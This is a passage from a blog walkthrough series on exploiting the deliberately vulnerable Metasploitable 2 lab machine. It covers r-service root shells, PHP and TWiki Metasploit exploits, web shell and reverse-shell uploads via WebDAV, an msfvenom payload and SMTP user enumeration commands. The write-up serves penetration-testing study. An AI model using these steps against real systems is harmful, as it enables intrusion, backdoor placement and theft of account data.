any host.<p>These are related to the historically insecure Berkeley r-commands developed back in 1982 based on an early implementation of the TCP/IP protocol stack.<p><a href="https://drive.google.com/uc?id=1ccWRPhJzqKXckUsVotcEu6KOC8_zhE1b" target="_blank"><img width="804" height="221" title="Scanning r-services ports with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Scanning r-services ports with Nmap" src="https://drive.google.com/uc?id=1A4Ia8usj3TZH1tRBctdCllf_AwUByEcc" border="0"></a><p>To take advantage of this, make sure the "rsh-client" client is installed (otherwise the system would default to SSH connections), and run <b><em>rlogin</em></b> command as your local root user. <p><b>NOTE</b>: Current Kali does not include the <b><em>rsh-client</em></b> tool. To install it just type <b><em>apt-get install rsh-client</em></b><h3>Exploiting rexec</h3><p>It is not possible anymore to install the <b><em>rexec</em></b> command on Kali and therefore you cannot take advantage of the vulnerable port 512.<h3>Exploiting rlogin</h3><p>The <b><em>rlogin</em></b> command will automatically connect to port 513 and give you a root shell:<p><a href="https://drive.google.com/uc?id=1H-4lfycfUBRD4FIdkZFawEwG44hXiGQB" target="_blank"><img width="786" height="330" title="Root access using rlogin" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Root access using rlogin" src="https://drive.google.com/uc?id=1tqv3M-2ky9jbtK3oOkpsSHwulAIs7m95" border="0"></a><h3>Exploiting rshell</h3><p>The<em> <b>rshell</b></em> command will automatically connect to port 514 and give you a root shell.<p>If you run this command (and the same for rlogin) as root, you don’t need to specify it in the command line:<p><a href="https://drive.google.com/uc?id=1zQZMprP9zIY8ZGXFvS3Xl1trVmO_DblL" target="_blank"><img width="781" height="324" title="Root access using rshell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Root access using rshell" src="https://drive.google.com/uc?id=1inzYIzFgae5sF16n5SPqzD2b3yOPd-lG" border="0"></a><p><br></p><p><p><a title="Metasploitable 2 Walkthrough: Part VI" href="https://myhackinglessons.blogspot.com/2020/11/metasploitable-2-walkthrough-part-vi.html"><br></a></p></p>Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.com0tag:blogger.com,1999:blog-6396309617370994433.post-29402134728177169722020-11-03T15:08:00.000-08:002020-11-21T00:10:45.226-08:00Metasploitable 2 Walkthrough: Part IV<h2>Exploiting Port 80 – PHP</h2><p>Navigating to the root of the web server, you will see some vulnerable web applications, along with the <strong><em>msfadmin</em></strong> account details which you got earlier with Telnet. <p>The Mutillidae and the DVWA web applications are outside the scope of this post because this is mostly focused on host-based exploitation. However, you can use easily exploit the other web applications to get a shell.<p><a href="https://drive.google.com/uc?id=1TCSeaA2jUMgIgmpnbbzScCJ8IwnWKxNf" target="_blank"><img width="446" height="372" title="Port 80 banner" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Port 80 banner" src="https://drive.google.com/uc?id=1KojiKtMOFODIDQ3cd8-lhI6FW7aNXR_S" border="0"></a><h3><a name="_Toc50732555"></a></h3><a name="more"></a><h3>Exploiting PHP using Metasploit</h3><p>You know port 80 is open so you type the IP address of Metasploitable 2 in our browser and notice that it is running PHP. If you dig a little further you will find which version of PHP is running and also that it is being run as a CGI.<p><a href="https://drive.google.com/uc?id=1giQPcT3KviUSYUAUXT6AHreYoCljEc94" target="_blank"><img width="774" height="530" title="PHP information" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="PHP information" src="https://drive.google.com/uc?id=1SBJjGewUiGpfcetO5McmmpPGM3eNjqU4" border="0"></a><p>When running as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. <p>Search and use the appropriate MSF module to get a shell.<p><a href="https://drive.google.com/uc?id=1ZBPOLHCJwy4ATAT-Cq6zKBkxoGdI0rRq" target="_blank"><img width="775" height="298" title="Exploiting PHP with MS" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting PHP with MSF" src="https://drive.google.com/uc?id=1FWbciAKNZZRAtOmXza15uDBWlfImo4HY" border="0"></a><h2>Exploiting Port 80 - TWiki</h2><p>TWiki is a Perl-based structured wiki application, typically used to run a collaboration platform, knowledge or document management system, a knowledge base, or team portal. Users can create wiki pages using the TWiki Markup Language, and developers can extend wiki application functionality with plugin.</p><h3>Exploiting TWiki using Metasploit</h3><p>The OpenVAS scan certainly revealed that the TWiki web application is vulnerable to remote code execution. There are some exploits available in MSF for this application.<p><a href="https://drive.google.com/uc?id=1DEcWQDwrEt47JyxvznJ73OUEypY8WC0T" target="_blank"><img width="785" height="149" title="MSF modules for TWiki" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="MSF modules for TWiki" src="https://drive.google.com/uc?id=1kOTD_EvoPf4VB4RrglMe_1_h-cgoGLWJ" border="0"></a><p>Both <b><i>twiki_history</i></b> and <b><i>twiki_search</i></b> are supposed to work flawlessly but that does not appear to be the case.<p><a href="https://drive.google.com/uc?id=1Wupd6IcIJE-yCWJ8YGGYVMB6Y8B5idR1" target="_blank"><img width="786" height="271" title="Exploiting TWiki with MSF" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting TWiki with MSF" src="https://drive.google.com/uc?id=1V7oVVI-oRsgWACheghpLUDvnMdFJ2_p7" border="0"></a><p>Confusing, but the session is created.<p>The other one refuses to create a session…<p><a href="https://drive.google.com/uc?id=1NpiQvwnHKhauXzq2ywBxxQtbxSxrdooe" target="_blank"><img width="783" height="353" title="Failed TWiki exploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Failed TWiki exploit" src="https://drive.google.com/uc?id=123zXfUrUwN0JxA3WOGn2BRpkDDLyq0re" border="0"></a><h2>Exploiting Port 80 - WebDAV</h2><p>WebDAV stands for Web Distributed Authoring and Versioning. The WebDAV protocol provides a framework for users to create, change and move documents on a server, typically a web server or web share. WebDAV is exploitable in many different ways.<h3>Exploiting WebDAV using Davtest</h3><p>You can test out DAV using the <b><em>davtest</em></b> command line utility. To scan a WebDAV server using the program just specify the URL:</p><p><a href="https://drive.google.com/uc?id=1_0iFV-wnqWP4fT1WT_6LYHMmGwBwubFC" target="_blank"><img width="557" height="504" title="Scanning WebDAV with davtest" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Scanning WebDAV with davtest" src="https://drive.google.com/uc?id=1B3FNZJtP9KUQbDXKfc5i4CEd7Ij0yOJi" border="0"></a><p>From the davtest scan, you saw a bunch of actions failed. I guess that means you need credentials to do anything. Or maybe you need a better tool…<h3>Exploiting WebDAV using Cadaver</h3><p>Cadaver is a utility for dealing with WebDAV systems on the command line. With cadaver, we can connect to the DAV server directly. It turns out this method does not require credentials. Once we type the <strong><em>cadaver</em></strong> command to connect to the server, we're immediately connected. Once connected you can issue a number of different commands.<p><a href="https://drive.google.com/uc?id=1-Ncj0uLa6XIB7bbmaIMYXNIu7j-mah9u" target="_blank"><img width="766" height="274" title="Exploiting WebDAV with cadaver" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting WebDAV with cadaver" src="https://drive.google.com/uc?id=16Yhg7fL19ew0k7MduwK63Z_dL7RfgOxb" border="0"></a><p>What this means is, you have access to the WebDAV directory, therefore you can create files. Namely, you can upload <b><em>web shells</em></b> to the WebDAV server.<p>Web shells are the scripts which are coded in many languages like PHP, Python, ASP, Perl and so on which further use as backdoor for illegitimate access in any server by uploading it on a web server. The attacker can then directly perform the read and write operation once the backdoor is uploaded to a destination, you can edit any file of delete the server file.<p>Kali Linux has inbuilt web shells PHP scripts. They are stored inside <b><em>/usr/share/webshells/php</em></b> and a pentester can make use of them without wasting time in writing PHP code for the malicious script.<p><a href="https://drive.google.com/uc?id=1HEMXfEBLVRXQWykYDqcxayjBUHbtry0b" target="_blank"><img width="685" height="244" title="Listing Kali's web shells " style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Listing Kali's web shells " src="https://drive.google.com/uc?id=115tjSjxn159Bl6b4o7khYnP94SbsKAT1" border="0"></a><p>You can take advantage of these scripts to get a remote shell. You start by uploading the script to the server using cadaver. <p>Upload the <b><em>simple-backdoor</em></b> script:<p><a href="https://drive.google.com/uc?id=1XAQs9r9SMgihYgBFGRsOykKhFmPkKHHw" target="_blank"><img width="753" height="120" title="Uploading the simple-backdoor script" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Uploading the simple-backdoor script" src="https://drive.google.com/uc?id=1_8ERX56TLSZ6PVC8aB_LysPgmccAq5Tn" border="0"></a><p>Then you execute the script on the web browser.<p><a href="https://drive.google.com/uc?id=1oOe4tHg-8kzmNoFI8-HGXBT3PWwkJzQJ" target="_blank"><img width="755" height="128" title="Executing the script on the browser" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Executing the script on the browser" src="https://drive.google.com/uc?id=1xhz0jiYoDzz4gHOLfmgAoMmewm84AHk8" border="0"></a><p>The script is now ready to execute commands<p><a href="https://drive.google.com/uc?id=1URjkS4uTIiXkRtYSOFcjYK1yTRGKsI0I" target="_blank"><img width="751" height="129" title="Executing a simple command" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Executing a simple command" src="https://drive.google.com/uc?id=1qk9Or3XSw04YX052JOb7he11hfFOvIvq" border="0"></a><p><a href="https://drive.google.com/uc?id=1fPFIKO_awsyfR6nvRluNV6rOkDoT2BeM" target="_blank"><img width="752" height="368" title="Dumping the /etc/passwd file" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping the /etc/passwd file" src="https://drive.google.com/uc?id=15DMrPYfTe0q5f01jyP1meFeMa0vs-QiH" border="0"></a><p>Try using a different script (<b>php-backdoor</b>)<p><a href="https://drive.google.com/uc?id=1ftZ7OppO2KBXNV6I0271e329Cj9UWXcp" target="_blank"><img width="762" height="86" title="Uploading the php-backdoor script" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Uploading the php-backdoor script" src="https://drive.google.com/uc?id=1nc2xy3vv16MkGa3q-5hJuZXBdY3AdU_3" border="0"></a><p>This script will give you true web shell to perform a number of tasks:<p><a href="https://drive.google.com/uc?id=1uEzw3GOAKJQ40Pe06f45scdmuAAjsZec" target="_blank"><img width="778" height="395" title="The php-backdoor web shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="The php-backdoor web shell" src="https://drive.google.com/uc?id=1OqCgLxNHwx8-hc5Y18Ekk8MYCy9ID-WF" border="0"></a><p>Run a command:<p><a href="https://drive.google.com/uc?id=1pgeUw7oqfhDYJNVg--UWv7Yg-vkLhOwu" target="_blank"><img width="763" height="101" title="Running the ls command in the web shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Running the ls command in the web shell" src="https://drive.google.com/uc?id=17rtWpKXEkxnKq_p-aoyrHwSFYlrEyV28" border="0"></a><p><a href="https://drive.google.com/uc?id=1A1PxRQW33uky5rcUDs75pShFn92X_Cnm" target="_blank"><img width="754" height="134" title="Running the ls command in the web shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Running the ls command in the web shell" src="https://drive.google.com/uc?id=1a-PCtsrMdu268OLjrn1eXmJTL6WrK1Y6" border="0"></a><p>Try a different script (<b>qsd-php-backdoor</b>):<p><a href="https://drive.google.com/uc?id=1crgWZcNkHNGf9Ov3mP_VV-wUw_v8Sl76" target="_blank"><img width="804" height="87" title="Uploading the qsd-php-backdoor script" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Uploading the qsd-php-backdoor script" src="https://drive.google.com/uc?id=1lu5VHFsHzXObDhvTgLV5c3Az6acpriRh" border="0"></a><p>And you will get an even better web shell:<p><a href="https://drive.google.com/uc?id=1lUrJvOG_vF-C2FRCfs7ci5sQAZyYr9sN" target="_blank"><img width="749" height="625" title="The qsd-php-backdoor script web shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="The qsd-php-backdoor script web shell" src="https://drive.google.com/uc?id=1SoeXaMPj2B1UGiXny8k05SKLcMXGys6b" border="0"></a><p>You can also create a reverse shell but for that you need to edit the script in order to adjust the settings to your needs. Namely, you will need to insert the IP address of your attacker machine so that the victim knows where to send the shell.<p>Edit the <b><em>php-reverse-shell.php</em></b> file and make the necessary changes:<p><a href="https://drive.google.com/uc?id=12bLUPNDhZDWc8BFlrOEPjJzLExIS4YPt" target="_blank"><img width="782" height="239" title="Editing the php-reverse-shell script" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Editing the php-reverse-shell script" src="https://drive.google.com/uc?id=1LT7fgrrzzc1thVDVjKcmYkfAup4BkYt_" border="0"></a><p>Now put the script on the server with cadaver, start a Netcat listener, and open the script with the web browser as before:<p><a href="https://drive.google.com/uc?id=1MSDl6zqI8cpsf_S4x_FzLrN0JIk9rSUs" target="_blank"><img width="808" height="84" title="Uploading the modified php-reverse-shell script" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Uploading the modified php-reverse-shell script" src="https://drive.google.com/uc?id=1VC0-8rBKxBW9MKzRZhgwnnZ3KvfOADVS" border="0"></a><p><a href="https://drive.google.com/uc?id=1kGT5COMLZ2LL9GikKJ3xrZ03JFAXd7Vs" target="_blank"><img width="390" height="128" title="Starting a Netcat listener" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Starting a Netcat listener" src="https://drive.google.com/uc?id=1xV_AVNCx_36Rio_q9CqeUV7fZizT_MCz" border="0"></a><p><a href="https://drive.google.com/uc?id=1iViphS71FXbR9zHUFqS2jisr9Gg5D2yB" target="_blank"><img width="806" height="136" title="Running the modified php-reverse-shell script" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Running the modified php-reverse-shell script" src="https://drive.google.com/uc?id=1ZaCfMcyY_NysHcRot5V3R64MbI7WyoN7" border="0"></a><p>And you will get a shell:<p><a href="https://drive.google.com/uc?id=10FOZjMN9Mj9bE1mx5GmObHNArmjohosL" target="_blank"><img width="736" height="225" title="Netcat shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Netcat shell" src="https://drive.google.com/uc?id=12y3r18609Up1ZD-gSUtNPSAM8niwcGd4" border="0"></a><h3>Exploiting WebDAV using Metasploit</h3><p>To check for WebDAV, you can use a couple of different modules:<p><a href="https://drive.google.com/uc?id=1N8PCwiyYDOygJpUJEkfNeUS-dGhUOfSI" target="_blank"><img width="734" height="174" title="Wrong MSF results" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Wrong MSF results" src="https://drive.google.com/uc?id=1OXLlMf2RPe9Zymkpl9bnus69Ve3xyYNH" border="0"></a><p>Wrong results…<p><a href="https://drive.google.com/uc?id=1mDrMCUZArj_8IXPZDb-09nEFAIVMnJK3" target="_blank"><img width="730" height="167" title="Failed MSF module" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Failed MSF module" src="https://drive.google.com/uc?id=1MgxX-GT2nkR40p90Bsodk2RhtyV3kjQN" border="0"></a><p>Also, not very useful…<p><a href="https://drive.google.com/uc?id=1f9ZYqPWS8nVhUoDobsbloh1cx0c6OxAk" target="_blank"><img width="731" height="139" title="Failed MSF module" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Failed MSF module" src="https://drive.google.com/uc?id=1tyMSP-ZxyXSND0RCX30RJuzPfupIhD0B" border="0"></a><p>Nothing…<p>But if you manage to find a writable directory, you can use it to get a remote shell.<h4>Creating a payload with MSFVenom</h4><p>The <b><em>msfvenom</em></b> utility can be used to generate a reverse TCP shell in a PHP script. Basically, here's what you specify with msfvenom:<ul><li>LHOST - This is the machine that you want your target machine to try and connect to. This must be the publicly-visible (or at least visible to the target) IP of your attacker machine.</li><li>LPORT - this is the port number that you want the target machine to connect to. The attacker machine must have this port open, for the target to connect to it.</li></ul><p>In this case, 172.16.1.6 is the IP of the attacker machine and 4444 the listener port on the attacker.<p><a href="https://drive.google.com/uc?id=1MGhtlGX-61X6Ltl5mjzoiZu9RPDTWGV4" target="_blank"><img width="828" height="116" title="Creating the msfvenom payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Creating the msfvenom payload" src="https://drive.google.com/uc?id=1HT1HwGWorLyJq0YQ0Z27kuKhpvIHdYYK" border="0"></a><p>Now use cadaver to connect and put the PHP shell onto the web server:<p><a href="https://drive.google.com/uc?id=1fHw3yETcy5c5yFYtwZWY4WVEtfmSmeDD" target="_blank"><img width="824" height="147" title="Uploading the payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Uploading the payload" src="https://drive.google.com/uc?id=1IqS5Nqk1IARhU67iDA1YYwup-OQ5kr07" border="0"></a><p>Now start a Metasploit listener using the proper MSF module and choosing the proper payload:<p><a href="https://drive.google.com/uc?id=1fzbBZYOyDaQWDUzu_LaWQW401cuESSs9" target="_blank"><img width="834" height="217" title="Starting a Metasploit listener " style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Starting a Metasploit listener " src="https://drive.google.com/uc?id=1fbZlpvaiKUZYV6dE4FfuyZVw-TjKJFeq" border="0"></a><p>This will wait for the reverse connection from the target machine.<p>The final step is to execute the PHP file. Click the PHP file or visit its URL in the browser. <p><a href="https://drive.google.com/uc?id=1Vl_wK-i57TJW1Ie0u8C8UsVoTYA8_ZbP" target="_blank"><img width="825" height="129" title="Executing the msfvenom payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Executing the msfvenom payload" src="https://drive.google.com/uc?id=1XlQKFvmp3BbUuvhGeZlcXVMRSxGigH5L" border="0"></a><p>This will execute the PHP code, create a shell, and open a connection to your Metasploit console.<p><a href="https://drive.google.com/uc?id=14LXXqKkQSlw6016fky3XZjQbwKKe94mI" target="_blank"><img width="821" height="133" title="Meterpreter reverse shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Meterpreter reverse shell" src="https://drive.google.com/uc?id=1fuYf7B9tonFG0ZC44_dxnRN1TVkc_VU5" border="0"></a><h2>Exploiting Port 80 - Apache Server</h2><p>This chapter will cover techniques for exploiting the Metasploitable Apache server (running Apache 2.2.8). It will start with some general techniques (working for most web servers), then move to the Apache-specific.<p>This will also ignore the Tomcat server - we'll get to that later.</p><h3>Exploiting Apache Server using Metasploit</h3><p> Let’s try some MSF modules:<p>The<strong><em> files_dir</em></strong> module checks for the presence of any interesting files on the web server. By default, it uses a dictionary list that comes with Metasploit <b>(<em>/usr/share/metasploit-framework/data/wmap/wmap_files.txt</em></b>) but you can also use your own.<h4><a href="https://drive.google.com/uc?id=1lBMP1Z93huu0CsNansewH6si2hK3GNfF" target="_blank"><img width="769" height="924" title="Using MSF to scan the Apache server" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Using MSF to scan the Apache server" src="https://drive.google.com/uc?id=1UbjnXi0clrOkdmqU9HyhdgchlNsky3xI" border="0"></a></h4><p>Some directories return the HTTP code 301 (Moved Permanently).<h4>Telnet to explore the 301s</h4><p>If we use telnet to connect to port 80 and send a GET request for a resource that returns a 301, we can see more information:<p>Connect to port 80 and type out a GET request, with the location being requested, and specify the host (then press ENTER to make a new line):<p><a href="https://drive.google.com/uc?id=17B_C4F7xKC_v3sK8d54vyw66Iu1aVRxN" target="_blank"><img width="436" height="221" title="Telnet to port 80" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Telnet to port 80" src="https://drive.google.com/uc?id=1O-Ra2ZytSa07Nj-G9mmIakTRUbf_VZQN" border="0"></a><p>You will get a phpMyAdmin page that looks like it has lots of information that could be fuzzed. However, fuzzing the phpMyAdmin login page (and attacking vulnerabilities in phpMyAdmin itself) will launch you into a whole new set of tools and concepts, so we'll leave that for some other time.<p><a href="https://drive.google.com/uc?id=1e0nZKUMGzSc_3tyIdCASjO3ztQij_GEE" target="_blank"><img width="778" height="515" title="phpMyAdmin page " style="margin: 0px auto; float: none; display: block; background-image: none;" alt="phpMyAdmin page " src="https://drive.google.com/uc?id=18iFBX02peOsqL7UX4CySN1fqPyM1V2sT" border="0"></a><p>Try some other MSF modules:<p><a href="https://drive.google.com/uc?id=10RXwPMksc2sc9WftzP9OKzkWQ_lBw-Bi" target="_blank"><img width="771" height="167" title="Failed MSF module" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Failed MSF module" src="https://drive.google.com/uc?id=1L4DyShrI2pa1pauBMR2OBHfVbC8_tFCo" border="0"></a><p>Funny, it doesn’t even show the previously found directories<p>This next one will find some additional directories<p><a href="https://drive.google.com/uc?id=1aTypHYIGI116UkaBbHszsThlRvKb3Vau" target="_blank"><img width="773" height="354" title="Using MSF to scan the Apache server" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Using MSF to scan the Apache server" src="https://drive.google.com/uc?id=1kyCQXaR-41sQct7zEavm4FIZh4AFjB0I" border="0"></a><p>There are many Apache-specific modules and that makes it difficult to figure out where to begin. Take a look at Legion/Nikto scan results and you’ll see the following vulnerability:</p><p><a href="https://drive.google.com/uc?id=16sa4mZGcrq_chRCPrOCia2uM7s7VenjS" target="_blank"><img width="816" height="120" title="Selecting an Apache server specific vulnerability" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Selecting an Apache server specific vulnerability" src="https://drive.google.com/uc?id=1oD49NEatmIGOZlR6O_qE-il8sF2soAsi" border="0"></a><p>Load the Metasploit module to scan for this vulnerability:<p><a href="https://drive.google.com/uc?id=1cxtNFsVZCaACECzJQq9ToFrcZG_IOidO" target="_blank"><img width="806" height="169" title="Using MSF to scan for the vulnerability" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Using MSF to scan for the vulnerability" src="https://drive.google.com/uc?id=12k-AptqLecejvksZzXG4gSDSvJL4xWp9" border="0"></a><p>Running it confirms that the Apache web server is vulnerable (IP addresses of vulnerable web servers are printed out).<p>Now load the other auxiliary module to try to take advantage of the vulnerability:<p><a href="https://drive.google.com/uc?id=1Hm-U3YYDwjmGHdfmWl8Fx2QsmrkBnkzV" target="_blank"><img width="802" height="170" title="Trying to exploit the vulnerability with MSF" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Trying to exploit the vulnerability with MSF" src="https://drive.google.com/uc?id=1tGAdI6FnXxcW4eva2mCo-_naccWFHUWe" border="0"></a><p>In this case, nothing happens confirming what you have found before; the <b><em>index.php</em></b> is the only file available on this Apache server.Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.com0tag:blogger.com,1999:blog-6396309617370994433.post-11647142275459544862020-11-03T14:04:00.000-08:002020-11-21T00:09:16.998-08:00Metasploitable 2 Walkthrough: Part III<h2>Exploiting Port 25 – SMTP</h2><p>SMTP stands for Simple Mail Transport Protocol and is a server-to-server protocol and keeps a local database of users to which it must send and receive emails.<h3>Exploiting SMTP using Metasploit</h3><p>Our first task is to determine which software and version is running behind port 25. Metasploit has an auxiliary module for you to use, so try it:<p><a href="https://drive.google.com/uc?id=1h9SUWm39ePpZZBpiG3hZ1ckBJ8DoTxqI" target="_blank"><img width="828" height="126" title="Enumerating SMTP with MSF" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SMTP with MSF" src="https://drive.google.com/uc?id=1cjojBDORlVJJixj72g8piXgTD1bOrobW" border="0"></a><p>Now you can search in Google, ExploitDB, etc.<p>And you can also try to enumerate the service users, using the proper Metasploit module.<p><a href="https://drive.google.com/uc?id=10o7Ac7auuaP4xAI8Vbn5KJGMfRUdWem1" target="_blank"><img width="832" height="173" title="Enumerating SMTP users with MSF" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SMTP users with MSF" src="https://drive.google.com/uc?id=1-9RdNCDemrEZIDUDfJcgLKiKJI2qCqeD" border="0"></a><p>The module was able to extract a list of users in the SMTP service<h3><a name="_Toc50732550"></a></h3><a name="more"></a><h3>Exploiting SMTP using other tools</h3><p>SMTP has a set of <a href="http://www.tcpipguide.com/free/t_SMTPCommands-2.htm">commands</a> that can be used for several tasks. You can to connect to your target through port 25 using Netcat and then get info on the email’s database using the SMTP commands.<p>Or, instead of verifying users one by one, you can try to use other tools. <p><em><strong>smtp-user-enum -M VRFY -U user.txt -t [Target IP]</strong></em><p>or<p><strong><em>smtp-user-enum -M VRFY -u root -t [Target IP]</em></strong><p>And you can also use Nmap to enumerate the target but the script appears to have problems.<p><strong><em>nmap --script smtp-enum-users -p 25 [Target IP]</em></strong><p><a href="https://drive.google.com/uc?id=1cZXj0q3g0EJJhimdw9g1BEwL8fAsiTW5" target="_blank"><img width="845" height="285" title="Enumerating SMTP users with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SMTP users with Nmap" src="https://drive.google.com/uc?id=1EEZ1rANTj7Wz0W5fi80VyHvZ0b3hqb0t" border="0"></a><p>As a side note, keep in mind the existence of enum4linux:<p><strong><em>enum4linux -U [Target IP]</em></strong><p>However, these options rely on old scripts/apps created in now obsolete versions of Perl or Python so don’t be surprised if they don’t always produce the best results when used inside the current Kali version (2020.3)<h2>Exploiting Port 53 – BIND</h2><p>The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) of the Internet. It performs both of the main DNS server roles, acting as an authoritative name server for domains, and acting as a recursive resolver in the network. As of 2015, it is the most widely used domain name server software and is the de facto standard on Unix-like operating systems.<p>Searching for exploits for ISC BIND 9.4.2, you will find the following exploit:<p><b><em>https://www.exploit-db.com/exploits/6122/</em></b><p>This exploit is labeled <i><strong>auxiliary/spoof/dns/bailiwicked_domain</strong></i> in Metasploit and it will allow you to insert malicious DNS records into the DNS server.<h3>Exploiting DNS: bailiwicked domain</h3><p>This attack allows you to add your own DNS entries to a target DNS nameserver. Thus, you could create a DNS entry like somethingveryevil.microsoft.com that would direct visitors wherever you wish.<p>After setting the options for the module, it should be possible to test it, but it fails:<p><a href="https://drive.google.com/uc?id=1i1F_9l5ZcsCS2siWOb72zOs1aweyoh16" target="_blank"><img width="824" height="262" title="Failed MSF module" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Failed MSF module" src="https://drive.google.com/uc?id=1rssvBN8gqmqIZYYEw3R15a-e6r47leao" border="0"></a><p>And the exploit itself also fails.<h3>Exploiting DNS: bailiwicked host</h3><p>This attack allows you to add your own host entry to a DNS nameserver's list of hostnames. This is done by confusing the nameserver by sending responses to fake DNS queries.<p><a href="https://drive.google.com/uc?id=1IJpL9AuvwMqcdNUOx1mF0r60yGRzqgl2" target="_blank"><img width="825" height="290" title="Failed MSF module" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Failed MSF module" src="https://drive.google.com/uc?id=1jJ0wlaZvhPBhPYGGUAQLKC_U6RdBZN-K" border="0"></a><p>Similar exploit, similar results.Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.com0